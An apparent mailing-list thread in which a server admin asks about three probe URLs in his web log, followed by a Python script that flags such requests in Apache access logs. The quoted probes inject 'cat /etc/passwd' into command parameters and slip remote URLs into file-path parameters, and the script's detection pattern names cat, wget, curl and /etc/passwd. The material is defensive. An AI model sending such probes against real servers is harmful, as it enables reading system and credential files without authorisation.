Because of the HTTP response 302, a safe bet would be to say he didn't get anything. Still, I would recommend that you sanitize the data you get from the parameters command and cmd. Also, simply go to the URL to see what he saw.
On Wed, Feb 12, 2014 at 9:58 PM, Knute Johnson <[email protected]> wrote:
> On 2/12/2014 08:04, rahul bhola wrote:
>> In the first and last case he was checking if it is possible to pass shell
>> commands through the command or cmd parameter. Not sure on the second one, but it
>> looks like he was testing for an unsanitized URL redirection vulnerability.
>>
>> On Wed, Feb 12, 2014 at 9:28 PM, Knute Johnson <[email protected]> wrote:
>>
>>> I found the following in my log this morning. Does anybody know
>>> what it really means? Thanks.
>>>
>>> A total of 3 possible successful probes were detected (the following URLs
>>> contain strings that match one or more of a listing of strings that
>>> indicate a possible exploit):
>>>
>>> /user.php?caselist[bad_file.txt][path]=http://www.google.com/humans.txt?&command=cat%20/etc/passwd HTTP Response 302
>>>
>>> /sid=XXXXXXXXXXXXXXXXXXXXXXXXXXXX&shopid=http://www.google.com/humans.txt? HTTP Response 302
>>>
>>> /gepi/gestion/savebackup.php?filename=http://www.google.com/humans.txt?&cmd=cat/etc/passwd HTTP Response 302
>>>
>>> --
>>> Knute Johnson
>>>
>>> ---------------------------------------------------------------------
>>> To unsubscribe, e-mail: [email protected]
>>> For additional commands, e-mail: [email protected]
>>
>> --
>> Rahul Bhola
>> B.E. Computers
>> Core Member, Department of Backstage
>> BITS Pilani KK Birla Goa Campus
>
> So you think he was trying to get the content of my passwd file? So what
> would that get him?
>
> Is it possible to do this myself to see what he could have gotten?
>
> Thanks,
>
> --
> Knute Johnson

--
Rahul Bhola
B.E. Computers
Core Member, Department of Backstage
BITS Pilani KK Birla Goa Campus
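The three log entries in the thread are the two probe patterns Rahul names: a URL supplied where a file name or path is expected (remote file inclusion) and a shell command supplied in a command or cmd parameter. The script below is an added example, not part of this thread or of Apache httpd: it scans access-log lines in Combined Log Format, pulls the parameters out of each request target (including the second probe, which has no `?` at all), classifies each value, and records the response status so the reader can answer Knute's question from the log rather than by replaying the request, since a 302 means the server redirected instead of serving content. The log lines are constructed for the example, modelled on the three URLs quoted above; the client addresses and timestamps are made up.

```python
"""Flag access-log requests whose parameters carry remote-file-inclusion or
shell-command probes, and note whether the response code suggests the server
served content (200) or only redirected (302)."""
import re
from collections import namedtuple
from urllib.parse import unquote

# Constructed sample log (Combined Log Format), modelled on the three probe URLs
# in the thread plus one ordinary request. IPs and timestamps are invented.
SAMPLE_LOG = """\
203.0.113.5 - - [12/Feb/2014:08:04:01 -0600] "GET /user.php?caselist[bad_file.txt][path]=http://www.google.com/humans.txt?&command=cat%20/etc/passwd HTTP/1.1" 302 246 "-" "Mozilla/5.0"
203.0.113.5 - - [12/Feb/2014:08:04:02 -0600] "GET /sid=XXXXXXXXXXXXXXXXXXXXXXXXXXXX&shopid=http://www.google.com/humans.txt? HTTP/1.1" 302 246 "-" "Mozilla/5.0"
203.0.113.5 - - [12/Feb/2014:08:04:03 -0600] "GET /gepi/gestion/savebackup.php?filename=http://www.google.com/humans.txt?&cmd=cat/etc/passwd HTTP/1.1" 302 246 "-" "Mozilla/5.0"
198.51.100.7 - - [12/Feb/2014:08:05:10 -0600] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

# Combined Log Format: client ident user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# A parameter value that is itself a URL: the classic remote-file-inclusion probe.
REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)
# A parameter value that looks like a shell command or names a sensitive file.
SHELL_RE = re.compile(r'\b(?:cat|wget|curl|uname)\b|/etc/(?:passwd|shadow)')

Finding = namedtuple("Finding", "lineno client target param value kind status served")


def extract_params(target):
    """Split a request target into (name, value) pairs.

    Splits on both '?' and '&' instead of using urllib's query parser so that a
    probe like '/sid=...&shopid=http://...' (no '?' anywhere) still yields pairs.
    """
    pairs = []
    for chunk in re.split(r"[?&]", target):
        name, sep, value = chunk.partition("=")
        if sep:
            pairs.append((unquote(name), unquote(value)))
    return pairs


def classify(value):
    """Return the probe category for a parameter value, or None if it looks benign."""
    if REMOTE_URL_RE.match(value):
        return "remote-file-inclusion"
    if SHELL_RE.search(value):
        return "command-injection"
    return None


def scan_log(text):
    """Return a Finding for every suspicious parameter in every parseable log line."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        m = LOG_RE.match(line)
        if not m:
            continue  # not a Combined Log Format line; skip rather than guess
        status = int(m.group("status"))
        for name, value in extract_params(m.group("target")):
            kind = classify(value)
            if kind:
                # 200/206 would mean the server returned a body for the probe;
                # 302 (as in the thread) means it redirected instead.
                findings.append(Finding(lineno, m.group("client"), m.group("target"),
                                        name, value, kind, status, status in (200, 206)))
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        verdict = "content served" if f.served else "redirected, nothing served"
        print(f"line {f.lineno} {f.client} {f.kind}: {f.param}={f.value!r} "
              f"-> HTTP {f.status} ({verdict})")
```

On the sample data the script flags all three probe lines and none of the ordinary request; every finding carries status 302, which is the basis for Rahul's "safe bet" that nothing was returned. Run it over a real `access_log` by replacing `SAMPLE_LOG` with the file contents; any finding with `served` set to True is the one worth investigating first.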
